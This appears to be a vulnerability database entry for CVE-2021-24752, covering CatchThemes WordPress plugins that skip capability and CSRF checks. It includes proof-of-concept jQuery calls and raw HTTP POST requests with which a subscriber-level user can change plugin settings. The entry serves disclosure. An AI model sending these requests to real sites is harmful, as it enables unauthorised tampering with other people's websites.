Lucene search
Apple502jWPEX-ID:181A729E-FFFE-457C-9E8D-A4343FD2E630HistorySep 20, 2021 - 12:00 a.m.
Multiple Plugins from CatchThemes - Unauthorised Plugin's Setting Change
2021-09-2000:00:00
apple502j
467
catchthemes
plugin settings
unauthorized access
post request
admin-ajax.php
exploit
EPSS
0.001
Percentile
21.2%
Multiple Plugins from the CatchThemes vendor do not perform capability and CSRF checks in the ctp_switch AJAX action, which could allow any authenticated users, such as Subscriber to change the plugin’s configurations.
1) Turn off "Turn On Catch Themes & Catch Plugin tabs"
jQuery.post(ajaxurl,{
action:"ctp_switch",
option_name:"theme_plugin_tabs",
value:"false"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [subscriber+]
action=ctp_switch&option_name=theme_plugin_tabs&value=false
2) Turn off "EW: Authors"
jQuery.post(ajaxurl,{
action:"ew_switch",
option_name:"ew_authors",
value:"false"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 59
Connection: close
Cookie: [subscriber+]
action=ew_switch&option_name=ew_authors&value=false
Related
prion
prion
Cross site request forgery (csrf)
2021-10-18 14:15:00
patchstack
patchstack
cvelist
cvelist
wpvulndb
wpvulndb
Multiple Plugins from CatchThemes - Unauthorised Plugin's Setting Change
2021-09-20 00:00:00
nvd
nvd
CVE-2021-24752
2021-10-18 14:15:10
cve
cve
CVE-2021-24752
2021-10-18 14:15:10